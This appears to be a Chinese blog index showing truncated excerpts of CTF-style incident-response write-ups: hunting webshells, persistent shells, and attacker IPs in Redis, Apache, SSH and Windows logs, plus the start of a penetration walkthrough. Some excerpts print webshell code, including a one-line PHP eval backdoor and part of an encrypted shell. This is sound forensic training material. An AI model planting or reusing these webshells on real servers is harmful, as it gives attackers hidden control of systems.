3.9k 4 分钟

# 题目 1 root@ip-10-0-10-3:~# cat /var/log/redis.log* | grep "Connecting" | cut -d" " -f10 | sort | uniq -c 48 192.168.100.13:8888 2 192.168.100.20:8888 1 192.168.31.55:8888root@ip-10-0-10-3:~# cat /var/log/redis.log|grep -w '192.168.100.20:8888' -C 3419:S 31 Jul 2023...
3.1k 3 分钟

# 题目 1 1. 黑客第一次写入的 shell flag {关键字符串} root@xuanji:/var/www/html# ls -lttotal 508-rw-r--r--. 1 www-data www-data 483403 Aug 1 2023 adminer.php-rw-rw-rw-. 1 mysql mysql 73 Aug 1 2023 sh.php-rw-rw-rw-. 1 mysql mysql 0 Aug 1 2023 tmpubzil.php-rw-rw-rw-. 1 mysql mysql 0 Aug 1 2023 tmputsrv.php-rw-rw-rw-....
1.7k 2 分钟

# 题目 1 web 目录存在木马,请找到木马的密码提交 html 打包下载,火绒直接查杀了三个 shell 文件出来。 root@ip-10-0-10-1:/var/www/html# cat 1.php <?php eval($_POST[1]);?>flag: flag{1} # 题目 2 服务器疑似存在不死马,请找到不死马的密码提交 root@ip-10-0-10-1:/var/www/html# cat .shell.php <?php...
2.3k 2 分钟

# 题目 1 1. 将黑客成功登录系统所使用的 IP 地址作为 Flag 值提交; windows 下使用 logpraser 查阅日志: D:\Desktop\Defense-Tool\Windows>LogParser -i:EVT "SELECT EXTRACT_TOKEN(Strings, 18, '|') FROM 安全.evtx WHERE NOT EXTRACT_TOKEN(Strings, 18, '|')='-' AND EventID = 4624"...
603 1 分钟

# 题目 1 通过本地 PC RDP 到服务器并且找到黑客植入 shell, 将黑客植入 shell 的密码 作为 FLAG 提交; 打开 phpstudy,查看网站根目录 网站根目录: C:\phpstudy_pro\WWW\WWW 老样子,下载下来直接拦截 哈希解密: rebeyond flag: flag{rebeyond} # 题目 2 通过本地 PC RDP 到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交; 打开日志目录:...
1.8k 2 分钟

# 题目 1 黑客 webshell 里面的 flag flag {xxxxx-xxxx-xxxx-xxxx-xxxx} 下载下来直接被拦了,发现木马。 <?php@session_start();@set_time_limit(0);@error_reporting(0);function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return...
7.1k 6 分钟

任务环境说明 注:进去后执行 sed -i's/Listen 80/Listen 9999/' /etc/apache2/ports.conf && service apache2 restart # 题目 1 攻击者通过什么密码成功登录了网站的后台?提交密码字符串的小写 md5 值,格式 flag {md5}。 根目录下有一个 wireshark.pcap 的流量包 wireshark 打开,先过滤 http 请求,然后追踪 http 流,通过关键字 &password 搜索,找到返回为 302 跳转的请求。 密码:...
663 1 分钟

# 题目 1 提交当天访问次数最多的 IP,即黑客 IP: cat /var/log/apache2/access.log* | grep "03/Aug/2023" | cut -d " " -f1 | sort | uniq -cflag: flag{192.168.200.2} # 题目 2 黑客使用的浏览器指纹是什么,提交指纹的 md5: cat /var/log/apache2/access.log* | grep "192.168.200.2" | cut...
1.6k 1 分钟

# 题目 1 1. 有多少 IP 在爆破主机 ssh 的 root 帐号,如果有多个使用 "," 分割 小到大排序 例如 flag {192.168.200.1,192.168.200.2} echo "flag{"$(cat /var/log/auth.log* | grep -a "Failed password for root" | cut -d " " -f 12 | uniq | sort | tr '\n' ','| sed...
6.4k 6 分钟

# 靶场搭建 下载:YourWAF Nat,IP: 192.168.1.131 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)| ssh-hostkey: | 256 1c:ec:5c:5b:fd:fc:ba:f3:4c:1b:0b:70:e6:ef:bf:12 (ECDSA)|_ 256 26:18:c8:ec:34:aa:d5:b9:28:a1:e2:83:b0:d3:45:2e (ED25519)80/tcp open http...